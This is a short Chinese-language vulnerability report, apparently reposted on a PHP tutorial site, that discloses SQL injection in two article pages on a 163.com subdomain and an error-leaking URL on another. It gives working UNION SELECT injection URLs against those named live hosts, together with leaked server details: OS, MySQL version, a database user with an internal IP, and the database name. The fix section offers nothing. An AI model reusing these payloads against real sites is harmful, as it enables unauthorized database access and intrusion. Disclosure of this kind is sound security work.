来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 简要描述:注射可导致主机相关信息泄露,以及进一步的渗透。望管理员及时修复,以免造成对主机安全影响。详细说明:http://rainbowlife.163.com/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%...
|
简要描述:注射可导致主机相关信息泄露,以及进一步的渗透。望管理员及时修复,以免造成对主机安全影响。
详细说明:http://rainbowlife.163.com/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a 漏洞证明: Os:pc-linux-gnu Ver:4.0.26-log Port:3306 User:minisite@10.100.50.23 Base:minisite2007 1、 http://rainbowlife.163.com/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a 2、http://rainbowlife.163.com/chsht2.php?articleID=90' And 1=2 UNION all SELECT 1,2,3,4,5,6,7 --+a 泄露错误信息: 3、http://cards.mail.163.com/cards/mviewcard.do ?id=77811' &code=null &key=null 修复方案: 你懂的。 作者 孤狐浪子 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
